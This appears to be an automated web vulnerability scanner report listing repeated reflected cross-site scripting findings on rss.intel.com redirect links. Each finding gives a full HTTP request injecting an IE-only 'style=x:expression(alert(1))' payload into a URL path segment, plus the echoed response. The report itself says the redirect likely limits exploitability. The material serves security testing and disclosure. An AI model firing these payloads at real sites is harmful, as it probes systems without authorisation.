GET /click/~rss-182178-c1-264172/newsroom.intel.com/community37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community37f9d"style="x:expression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829 was submitted in the REST URL parameter 5. This input was echoed as c273f"style="x:expression(alert(1))"5a8a63b8829 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroomc273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomc273f"style="x:expression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06 was submitted in the REST URL parameter 6. This input was echoed as 975bc"style="x:expression(alert(1))"2eca44a5c06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog975bc"style="x:expression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d was submitted in the REST URL parameter 7. This input was echoed as 45d4d"style="x:expression(alert(1))"ddfc2782d6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style="x:expression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d4a"style%3d"x%3aexpression(alert(1))"41c87971c29 was submitted in the REST URL parameter 8. This input was echoed as 68d4a"style="x:expression(alert(1))"41c87971c29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style%3d"x%3aexpression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style="x:expression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d was submitted in the REST URL parameter 9. This input was echoed as deb50"style="x:expression(alert(1))"8f86c2e6e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style="x:expression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf was submitted in the REST URL parameter 10. This input was echoed as 8990d"style="x:expression(alert(1))"6a4a1f59ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style="x:expression(alert(1))"6a4a1f59ddf?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2 was submitted in the REST URL parameter 2. This input was echoed as 3c13a"style="x:expression(alert(1))"dbd34b499c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-2640903c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2640903c13a"style="x:expression(alert(1))"dbd34b499c2"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d was submitted in the REST URL parameter 3. This input was echoed as 542f9"style="x:expression(alert(1))"6ae2d48504d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com542f9"style="x:expression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02 was submitted in the REST URL parameter 4. This input was echoed as 18b87"style="x:expression(alert(1))"1cf80933b02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community18b87"style="x:expression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa was submitted in the REST URL parameter 5. This input was echoed as da64d"style="x:expression(alert(1))"dba1dcf6eaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroomda64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomda64d"style="x:expression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42 was submitted in the REST URL parameter 6. This input was echoed as c5de8"style="x:expression(alert(1))"b9a36043a42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blogc5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc5de8"style="x:expression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210fc"style%3d"x%3aexpression(alert(1))"72bb478d645 was submitted in the REST URL parameter 7. This input was echoed as 210fc"style="x:expression(alert(1))"72bb478d645 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style%3d"x%3aexpression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style="x:expression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6 was submitted in the REST URL parameter 8. This input was echoed as 1ca69"style="x:expression(alert(1))"d3ef2b7acf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style="x:expression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78 was submitted in the REST URL parameter 9. This input was echoed as 56bbf"style="x:expression(alert(1))"8390e8a9d78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style="x:expression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 was submitted in the REST URL parameter 10. This input was echoed as dd2dc"style="x:expression(alert(1))"a09a84ec8e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style="x:expression(alert(1))"a09a84ec8e8?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac was submitted in the REST URL parameter 2. This input was echoed as c3d82"style="x:expression(alert(1))"a47bdb4daac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093c3d82"style="x:expression(alert(1))"a47bdb4daac"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf234"style%3d"x%3aexpression(alert(1))"80af0cefb29 was submitted in the REST URL parameter 3. This input was echoed as bf234"style="x:expression(alert(1))"80af0cefb29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.combf234"style%3d"x%3aexpression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.combf234"style="x:expression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9 was submitted in the REST URL parameter 4. This input was echoed as ee58f"style="x:expression(alert(1))"9a29b5a08b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/communityee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityee58f"style="x:expression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0 was submitted in the REST URL parameter 5. This input was echoed as dc484"style="x:expression(alert(1))"f99e89de0d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroomdc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomdc484"style="x:expression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5 was submitted in the REST URL parameter 6. This input was echoed as 2734c"style="x:expression(alert(1))"dfc1ad19df5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog2734c"style="x:expression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49 was submitted in the REST URL parameter 7. This input was echoed as 858f3"style="x:expression(alert(1))"f39a96aae49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style="x:expression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f was submitted in the REST URL parameter 8. This input was echoed as 76c51"style="x:expression(alert(1))"f5ad9d5bc7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
